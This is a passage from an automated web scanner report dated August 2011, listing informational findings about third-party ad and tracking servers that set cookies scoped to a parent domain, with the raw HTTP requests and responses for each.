Content-Length: 0
Date: Mon, 15 Aug 2011 18:25:05 GMT


12.16. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/bh.gif?n=826&g=20&a=2&s=1&l=1&t=i&f=1&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.zedo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFgeo=5386156; ZEDOIDA=Gk1EThcyantUIc4uiIsUXCzG~081111; ZEDOIDX=29; FFAbh=957B740,20|1_1#365; FFBbh=957B740,20|1_1#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 90
Content-Type: image/gif
Set-Cookie: ZFFAbh=957B826,20|2_2#365;expires=Sun, 13 Nov 2011 18:55:36 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZFFBbh=957B826,20|2_2#0;expires=Tue, 14 Aug 2012 18:55:36 GMT;domain=.zedo.com;path=/;
ETag: "1b6340a-de5c-4a8e0f9fb9dc0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=28968
Expires: Tue, 16 Aug 2011 02:58:24 GMT
Date: Mon, 15 Aug 2011 18:55:36 GMT
Connection: close

GIF89a.............!.......,...........D..;


GIF89a.............!.......,...........D..;

12.17. http://g.ca.bid.invitemedia.com/pubm_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://g.ca.bid.invitemedia.com
Path:   /pubm_imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pubm_imp?returnType=image&key=AdImp&cost=2475900&creativeID=130695&message=eJwlzT0OgCAMhuGrmM6S0JYCdeNHT0PcnIx3t.j2Pkm_9AZm2BbSzHFdgMmQKKsPJjSABs4d9.aQU3EBq7qSpbijca8oiuwTzOk8TkK_6NMssULyahksz2sMyzj_eBJ8XoEzGbU-&managed=false HTTP/1.1
Host: g.ca.bid.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ca.rtb.prod2.invitemedia.com/build_creative?click_url=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=uWIAAMFiAAAETgAAOAUAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAANgCAABaAAAAAAAAAAIAAAAxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=&cost=2.4759&mapped_uid=7-125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF&us_id=1209&creative_id=130695&campaign_id=61138&source_url=http%3A%2F%2Fimdb.com&exch_id=7&auction_id=9438D1EC-137A-41B9-A85A-FC3DB1591307&pub_line_item_id=29836&inv_size_id=70251&referrer_url=http%3A%2F%2Fbpx.a9.com%2Famzn%2Fiframe.html&line_item_id=728904&invite_uid=1e4cb365-db7a-4e61-9b94-c144934e6ac1&zip_code=75207
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=1e4cb365-db7a-4e61-9b94-c144934e6ac1; subID="{}"; impressions="{\"769846\": [1312767370+ \"dffe82cd-ff8c-4145-a734-bdd8d42b5cc7\"+ 69905+ 29809+ 1365]+ \"748419\": [1312767414+ \"c293e3f7-1374-398b-ad44-93d92a9ce4be\"+ 219708+ 61959+ 12050]+ \"728928\": [1313426607+ \"c4c0133b-0eac-475e-83d5-75db053b7608\"+ 70238+ 29835+ 1209]+ \"718819\": [1313102115+ \"08dcd5d0-76e4-4739-88e9-ffac3e204fc4\"+ 69900+ 29809+ 1365]+ \"799461\": [1313426618+ \"98F18B32-A1BA-4442-B3D4-AC0B1190E029\"+ 69861+ 29806+ 1209]+ \"728904\": [1313426573+ \"d7090a0b-960a-46fe-90f5-5e451fe1ab2c\"+ 70238+ 29835+ 1209]}"; camp_freq_p1="eJzjkuF4PYFNgFFi18yln1gUGDV23V//icWA0QLM55LhOLOOBSi7Hir7GkQDZddDZS/dZQbK9kJlT0JlwXwuEY5Vx0EmL940ESjLoMFgwGDBABTtegUS3fb7z0dk0e5mdgEmiS5kUQAIgzND"; exchange_uid="eyIyIjogWyIzNTM5NjU2OTQ2OTMxNTYwNjk2IiwgNzM0MzUyXSwgIjQiOiBbIkNBRVNFSkYxUkRIYVhLUk43UTQ3eUpPVXdMayIsIDczNDM0MF0sICI3IjogWyIxMjVBQkE5RC0wRkUyLTQzQkItQURFNS0wRTFBMjkwRjBDQUYiLCA3MzQzNjRdfQ=="; io_freq_p1="eJzjEuaYFC/AKLFr5tJPLAaMFmCaS5xjj4sAk8R6EEeBQYPBgMmiFywhzDE1WYBZYvGmiVAJBgsGoODkNKAR237/+QgXBAC33hmb"; dp_rec="{\"1\": 1313426619+ \"2\": 1313426607+ \"4\": 1313426573}"; partnerUID=eyIxMTUiOiBbIjRlMzcxMDA1OGNmNzZjOTAiLCB0cnVlXSwgIjE1IjogWyIwMDMwMDEwMDIxOTAwMDAwNzk3NDAiLCB0cnVlXSwgIjg0IjogWyJIaTFIMWh6OTk5OTNlSDJtIiwgdHJ1ZV19; segments_p1="eJzjYubYyMPFxbH/ALPAi2nHPrEA2Sd7mARerN0GZLNwdHYwczFzHGfk4uSYHiBw79iEzywAncMQww=="; __utma=140145771.1424462457.1313432170.1313432170.1313432170.1; __utmb=140145771.4.10.1313432170; __utmz=140145771.1313432170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 15 Aug 2011 18:26:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 15-Aug-2011 18:25:58 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 14-Aug-2012 18:26:18 GMT; Path=/
Set-Cookie: impressions="{\"769846\": [1312767370+ \"dffe82cd-ff8c-4145-a734-bdd8d42b5cc7\"+ 69905+ 29809+ 1365]+ \"748419\": [1312767414+ \"c293e3f7-1374-398b-ad44-93d92a9ce4be\"+ 219708+ 61959+ 12050]+ \"728928\": [1313432713+ \"69816DAB-3F85-46AF-8D01-3B5FF6A6F956\"+ 70251+ 29836+ 1209]+ \"718819\": [1313102115+ \"08dcd5d0-76e4-4739-88e9-ffac3e204fc4\"+ 69900+ 29809+ 1365]+ \"799461\": [1313426618+ \"98F18B32-A1BA-4442-B3D4-AC0B1190E029\"+ 69861+ 29806+ 1209]+ \"728904\": [1313432778+ \"9438D1EC-137A-41B9-A85A-FC3DB1591307\"+ 70251+ 29836+ 1209]}"; Domain=invitemedia.com; expires=Tue, 14-Aug-2012 18:26:18 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuG4dJdZgFni1Mmln1gUGDXaTgFpA2aL3plAmkuC48w6FgEmiU6wLIMGgwGTxXqwjAzH6wlsAowSu2ZC9O26vx6oj9ECzOcS4Vh1HCS7eNNEqD4GCwagaNcrkOi2338+Iot2N7MD7ehCFgUAlyAwig=="; Domain=invitemedia.com; expires=Tue, 14-Aug-2012 18:26:18 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEufY4yLAKnHq5NJPLAoMGgwGrBa9M4FsLnGOSfECjBK7ZsIkGC3AbC5hjqnJAswSizdNhEowWDAABSenAVVv+/3nI1wQAPZnGjg="; Domain=invitemedia.com; expires=Tue, 14-Aug-2012 18:26:18 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

12.18. http://gdyn.cnn.com/1.1/1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gdyn.cnn.com
Path:   /1.1/1.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1.1/1.gif?1313433963987 HTTP/1.1
Host: gdyn.cnn.com
Proxy-Connection: keep-alive
Referer: http://www.cnn.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:08 GMT
Server: Apache
X-Netacuity: success
Set-Cookie: adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; expires=Mon, 22 Aug 2011 21:45:08 GMT; domain=.cnn.com; path=/
Set-Cookie: adDEon=true; expires=Mon, 22 Aug 2011 21:45:08 GMT; domain=.cnn.com; path=/
Last-Modified: Wed, 01 Dec 2004 19:27:52 GMT
ETag: "d0a8dd-2b-e6d33e00"
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: max-age=60, private
Expires: Mon, 15 Aug 2011 18:46:08 GMT
P3P: CP="NOI DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI COM NAV STA"
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.19. http://i.w55c.net/ping_match.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /ping_match.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?ei=PUBMATIC&rurl=http%3A//image2.pubmatic.com/AdServer/Pug%3Fvcode%3Dbz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw%26piggybackCookie%3Duid%3A_wfivefivec_ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchdatran=1; matchtargus=1; wfivefivec=8413bde9-2099-43af-b214-8fee85ef2861; matchbluekai=1; matchgoogle=1

Response

HTTP/1.1 302 Found
Date: Mon, 15 Aug 2011 18:26:18 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=8413bde9-2099-43af-b214-8fee85ef2861;Path=/;Domain=.w55c.net;Expires=Wed, 14-Aug-13 18:26:18 GMT
X-Version: DataXu Pixel Tracker v3
Cache-Control: private
Content-Length: 0
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw&piggybackCookie=uid:8413bde9-2099-43af-b214-8fee85ef2861
Via: 1.1 dfw175164010000 (MII-APC/2.0)
Content-Type: text/plain


12.20. http://ib.adnxs.com/getuidnb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuidnb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuidnb?http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZqcz0xJmNvZGU9NzkmdGw9MTQ0MCZkcF9pZD01Nw==&vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9NzgmdGw9MTU3NjgwMCZkcF9pZD01Nw==&piggybackCookie=uid:$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIItI8BEAoYASABKAEwmKyi8gQKEgi_jwEQChgBIAEoATDJnqLyBBCYrKLyBBgB; sess=1; uuid2=3539656946931560696; anj=Kfw)rM<G[$*w8a!CE*E+ZS$olpY=vi!xWMdnHfNA%%_a(XaP_dO+*1SI/cAR>4[S%OMD4T4LR^^*%2Xs:`NoQ03Ttm<<p:3=)OOIE17fYk_Q$Qc`L.:S<N>QbG^G[J<Ts-Usr/MpwvK]X>Z:Oh/nyTvJg-yd>B7gXq.B-9+T1^tGf!`<Aw[u7a:qF32hP`%>Z1G=qwF@:]!Qs.gGhh1vWb7vnmJw?u^NjWbg*foW7fAUnM!=opR-n-+o%[75Y.Ndo/kN>i23*a-EgI'A/Ob(a!IX83)L+ChHH3B<>$hrqsNCY855uwm%.WV+6$v7JTjSrm]KP[Y>Z4f2Aks1!5+wc28NK54F@uMV6^Ip>uY)x<D.Fc:036'GnCFcEcBq6WwsuSqDXyFPPidv`MlJJxy!)Rivve$)d$z*Bb5[d#mv*Gp9kLodzQR#!@*8Cu!d-cSf$X7:LZLmk*kb%)pKuqo<e1boTi5*a[Men3o+]I!10nf5>P@1UDSYP@]_^BUj=m?Owc[%!_DYI(HLf+wR)v!Sto2ckXLin=XpUa0MNzL@ZQA%u8Y+OvJ#wmzN!O-!A:!2+]FS2^!$]dFzgrmByDwUgnV[1jpb($Qa5on.HfLlc>S18Nu:p5ZaayP[+Y8-v6a2o:%2v%IWw9n-h@uKXMm6<(E/F''M?JdcXShW1#jAKN[GJ)l?s+ddqFwGpIahj-v]r%ghn(P%zoL3dD?O-)A:s%Z2)5^U=h@RKu^G!gbA'^Wk)LQi`#.)Ef5jNPg.^BVk@%'MfaZ'UnXPud'wqr^$QvcZ[2)cXi<nvE(C$Lh/Ke7e$_2CrH3M0h'<%+P+DW!Pw(rI'z3`=El33%@T/k^VRh(5t0!9#eF+Od7BS*w![IElx>>POV24xdh)yvqo*ojOEiEi.[Q!]CnvEV+w]530*K/Xcn1(0dv]2.I(m23..UW.S5LyLG'x:[02<nl'W(f<MKxJu8@Oqp#RWG(D5$1=cFsm72X?K3$Q9oSud6I-GpuCTpQXy+!JPR:nK:tqkIv?muP.][LV2Pq7?SPtvs`W@$%vObcwcS(bI`6rW+LOB*p+czcm-#HuoQthLotztHPwrN%jyxi$`e?dn0ttQ/n4he'1#J!NzCO6dV(3jn0F<^]K@1]AeAyh'8-6+nSx4JGp[H>jWr`!)OzmvO%Z:gs6xmmc)a8(Hst0G2o.$.q69r70hAIp.J$if'$?dbkHwy1:U>zi'FpSKdLGm4BUEasa'xE3+<%hlNj/`Xs<a7_ucM)<Lnf6gr]YpyH:FnAP(=jX^lGQhN7MMTdIVL)KX-_?X<-S0*_G]-kw<u?w6$BHt=VUxuoc5rFX6=<5YA0MgSRoL]:@PIn#lUf/7aSLuH:cFT67ty]8x'QK`MMdD*z?*S+%wSi>yjn5j>9lC[e-T%Xtg4`goU9V'[Y=m0gb)q3.N@6GDxV-4?R`#^^JsdCp3^`i<:(qorQHLs'^`s$Kz.m#?:_NKjC'I65W(x.aYi![[6$

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 16-Aug-2011 18:26:17 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3539656946931560696; path=/; expires=Sun, 13-Nov-2011 18:26:17 GMT; domain=.adnxs.com; HttpOnly
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZqcz0xJmNvZGU9NzkmdGw9MTQ0MCZkcF9pZD01Nw==&vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9NzgmdGw9MTU3NjgwMCZkcF9pZD01Nw==&piggybackCookie=uid:3539656946931560696
Date: Mon, 15 Aug 2011 18:26:17 GMT
Content-Length: 0


12.21. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=162528&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIItI8BEAoYASABKAEwmKyi8gQKEgi_jwEQChgBIAEoATDJnqLyBBCYrKLyBBgB; anj=Kfw)rM<G[$*w8a!CE*E+ZS$olpY=vi!xWMdnHfNA%%_a(XaP_dO+*1SI/cAR>4[S%OMD4T4LR^^*%2Xs:`NoQ03Ttm<<p:3=)OOIE17fYk_Q$Qc`L.:S<N>QbG^G[J<Ts-Usr/MpwvK]X>Z:Oh/nyTvJg-yd>B7gXq.B-9+T1^tGf!`<Aw[u7a:qF32hP`%>Z1G=qwF@:]!Qs.gGhh1vWb7vnmJw?u^NjWbg*foW7fAUnM!=opR-n-+o%[75Y.Ndo/kN>i23*a-EgI'A/Ob(a!IX83)L+ChHH3B<>$hrqsNCY855uwm%.WV+6$v7JTjSrm]KP[Y>Z4f2Aks1!5+wc28NK54F@uMV6^Ip>uY)x<D.Fc:036'GnCFcEcBq6WwsuSqDXyFPPidv`MlJJxy!)Rivve$)d$z*Bb5[d#mv*Gp9kLodzQR#!@*8Cu!d-cSf$X7:LZLmk*kb%)pKuqo<e1boTi5*a[Men3o+]I!10nf5>P@1UDSYP@]_^BUj=m?Owc[%!_DYI(HLf+wR)v!Sto2ckXLin=XpUa0MNzL@ZQA%u8Y+OvJ#wmzN!O-!A:!2+]FS2^!$]dFzgrmByDwUgnV[1jpb($Qa5on.HfLlc>S18Nu:p5ZaayP[+Y8-v6a2o:%2v%IWw9n-h@uKXMm6<(E/F''M?JdcXShW1#jAKN[GJ)l?s+ddqFwGpIahj-v]r%ghn(P%zoL3dD?O-)A:s%Z2)5^U=h@RKu^G!gbA'^Wk)LQi`#.)Ef5jNPg.^BVk@%'MfaZ'UnXPud'wqr^$QvcZ[2)cXi<nvE(C$Lh/Ke7e$_2CrH3M0h'<%+P+DW!Pw(rI'z3`=El33%@T/k^VRh(5t0!9#eF+Od7BS*w![IElx>>POV24xdh)yvqo*ojOEiEi.[Q!]CnvEV+w]530*K/Xcn1(0dv]2.I(m23..UW.S5LyLG'x:[02<nl'W(f<MKxJu8@Oqp#RWG(D5$1=cFsm72X?K3$Q9oSud6I-GpuCTpQXy+!JPR:nK:tqkIv?muP.][LV2Pq7?SPtvs`W@$%vObcwcS(bI`6rW+LOB*p+czcm-#HuoQthLotztHPwrN%jyxi$`e?dn0ttQ/n4he'1#J!NzCO6dV(3jn0F<^]K@1]AeAyh'8-6+nSx4JGp[H>jWr`!)OzmvO%Z:gs6xmmc)a8(Hst0G2o.$.q69r70hAIp.J$if'$?dbkHwy1:U>zi'FpSKdLGm4BUEasa'xE3+<%hlNj/`Xs<a7_ucM)<Lnf6gr]YpyH:FnAP(=jX^lGQhN7MMTdIVL)KX-_?X<-S0*_G]-kw<u?w6$BHt=VUxuoc5rFX6=<5YA0MgSRoL]:@PIn#lUf/7aSLuH:cFT67ty]8x'QK`MMdD*z?*S+%wSi>yjn5j>9lC[e-T%Xtg4`goU9V'[Y=m0gb)q3.N@6GDxV-4?R`#^^JsdCp3^`i<:(qorQHLs'^`s$Kz.m#?:_NKjC'I65W(x.aYi![[6$; sess=1; uuid2=3539656946931560696

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 16-Aug-2011 18:41:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3539656946931560696; path=/; expires=Sun, 13-Nov-2011 18:41:42 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)rMt%mo-9:Wc34+7'?gPuHJLo(GNLKg6nHfNA%%c_fNERK'O+$h]nW]a@WF2zU$zQGrV5kilQ]nAw:D2fPoj8'</TKZ*8v3i^bWwRx+iBAno-@pvN+#l*b3#u.wWFdk7Ns(t=viY_t?C89FxZr4Y(MwJ@hH?EOQ]XcgKaCtu6LRGISakFR4UljkKB5N:#vD>bM*63(4yQ5Og0T5qFS/WU`QN`^hCpsB6KME%=D!DpST:?aAA85Pso<1DVir-MGQ't(*X/7KL93umnS5J2+qp9pExAWs8a9g`<ikAwY2c]2[-*ztHcu^ey`$Tntw<jL7-d?Z:P3e-mSrYY?56ZvFj]Ijgs!.MY?bgp>uZVwvG96L<j(F'*R9EcEcB`It/wXSs)+C4f9spwN'x66yz!%<(4%p/N7Jp%_Gi.nF7Yj`dXR9IozfgOg+*a^VW'^msn`l-Zd?dHs%sCO_aeLu7YO*CIhFX%nDfDs7eYl6!/.qo8?50)vBgLd1K^G2vT_t1H0N#O[J)fI#0[?+w^Hb'UnWon'.>rs=.P=r#CMgmaS=W#0<7hnXJX85ztRZ<(OC=%=2h/%eGk^^V2Y4KNR`fEfp2^%=jYIde'=da08(%a(1T'h^xHF+y(JOdib@Y(/:rWILo$x#pPSZI'v4x7>duY/DP_t'7Ex8I!o8fhDP5ZbE`jC+Is2UcuW.eGpaE>?y+k[%ghn(P%zoL3`.N+60^Oj*US1]^VzsLo8JR1#axn_Ct+%k*[1$80gObD%[p0tI#0'd5t@YH+k4>9nN`5>a1hVdwxGoLMuvKbg_H#gqod=wtwt%lP$d/`6!nC5kB(CeJT'#CN[!vIBUW!FjWpy('uW!.I(5@h-L7+k(fpAfnIyS$n0yGG/7q:-+7m4RD9azD-#:Z@%kU(/$=5[*6%*mNA5PEI88_5t5W>)j#10tosKHc4s4mI_7uDV3cSkaOiKcMVCxj1BqovIx*ZvnvIsGR]dNi>vD40@HkBE)'*(js5'gtuos9-:+`dnuBK8+z)#:GdjnZXo<SCJ8-!_mdJOe/>E-#AUV)F!Ga#cZ>PNFe%hBVaDPBQv>6(KzUZ#Cr3F!F:tBkI(My8NlPa81H`Y)tH^v89L<QTQnK3_lbSD0%YMR$7*7tI%jkrHmGcD?Ox=l#bwWLn$=-.7u'D/>ZufU$GLVCNCUnEnB_dLLq!o8+$]S8cr!dpI#K/R'^mq3-KlGAnLV@tC7J+s5t>z''a.'KdZ@zba1'7!A5B1$B82x76MHgI+Is`b#-dSHs<9jfuZQDN7but^Lgcqg0]j-E%=WiOdY%/Rs?Li1c%Nb]#8bq$uo4.u#=15c2pVCXP=8-ZYC%a3w.dgl4yZmM>MT1Uv$</c<g5cUp>2P/%4G`C')7GKnL547MGuOIt-xEtnB>+*v_?lQTS8mZ/>=EcM8g=$p=jIB^[9!7-_YX+v%YP43<4*yY.Jz?0N=O[@vu79r/*m.6Wo]FfDG`N?VkF0nty[[:J*t@J]@`!; path=/; expires=Sun, 13-Nov-2011 18:41:42 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Mon, 15 Aug 2011 18:41:42 GMT

GIF89a.............!.......,........@..L..;

12.22. http://idpix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idpix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=3715 HTTP/1.1
Host: idpix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lpcr330zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; orblb=2lpscpz022ng10u01021mc27e10w0100000; vstcnt=41aj010r02458kv231p20420820pw30520820923sti11hj1042; clid=2lpcr3301171sbvs30c072oq0hnal00b68020x0980b; sglst=2040s0tolpl5u5098jj00968020x09809ag2lpuecb0001d00268020x028025colpscpz021np00368020x03803c1zlpuecb0001d00268020x02802; rdrlst=40n0g91lpuecb0000000268021196lpuecb00000002680213j3lpl5w50000000768021195lpuecb0000000268020camlpuecb0000000268020cjrlpuecb0000000268021194lpuecb00000002680200cclpuecb00000002680212pulpuecb00000002680210rdlpuecb0000000268020znmlpmzu30000000568021193lpuecb0000000268021ad8lpuecb0000000268021192lpuecb00000002680210tylpuecb000000026802196mlpmmkk0000000668020rbglpuecb00000002680215xylpl5u500000009680210polpl5vm00000008680212qnlpuecb00000002680210telpuecb0000000268020ciclpuecb0000000268020g8tlpscpz000000036802; acs=014020e0f0h1lpcr33xzt1flkuxzt18er2xzt1hnal

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: orblb=2lpscpz022ng10u01021mc27e10w0100000; Domain=media6degrees.com; Expires=Sat, 11-Feb-2012 18:26:16 GMT; Path=/
Set-Cookie: vstcnt=41aj010r02458kv231p20420820pw30520820923sti11hj1042; Domain=media6degrees.com; Expires=Sat, 11-Feb-2012 18:26:16 GMT; Path=/
Set-Cookie: clid=2lpcr3301171sbvs30c072oq0mo4p00d6b020y0280d; Domain=media6degrees.com; Expires=Sat, 11-Feb-2012 18:26:16 GMT; Path=/
Set-Cookie: sglst=2040s0tolpl5u50e9dn00b6b020y0280bag2lpuecb050vh0046b020y028045colpscpz072ht0056b020y02805c1zlpuecb050vh0046b020y02804; Domain=media6degrees.com; Expires=Sat, 11-Feb-2012 18:26:16 GMT; Path=/
Set-Cookie: rdrlst=40n0g91lpuecb000000046b021196lpuecb000000046b0213j3lpl5w5000000096b021195lpuecb000000046b020camlpuecb000000046b020cjrlpuecb000000046b021194lpuecb000000046b0200cclpuecb000000046b0212pulpuecb000000046b0210rdlpuecb000000046b020znmlpmzu3000000076b021193lpuecb000000046b021ad8lpuecb000000046b021192lpuecb000000046b0210tylpuecb000000046b02196mlpmmkk000000086b020rbglpuecb000000046b0215xylpl5u50000000b6b0210polpl5vm0000000a6b0212qnlpuecb000000046b0210telpuecb000000046b020ciclpuecb000000046b020g8tlpscpz000000056b02; Domain=media6degrees.com; Expires=Sat, 11-Feb-2012 18:26:16 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 15 Aug 2011 18:26:15 GMT
Connection: close

GIF89a.............!.......,...........D..;

12.23. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM2MiZ0bD00MzIwMA==&piggybackCookie=uid:4e394114-5150-5bce-73fa-628197421391 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
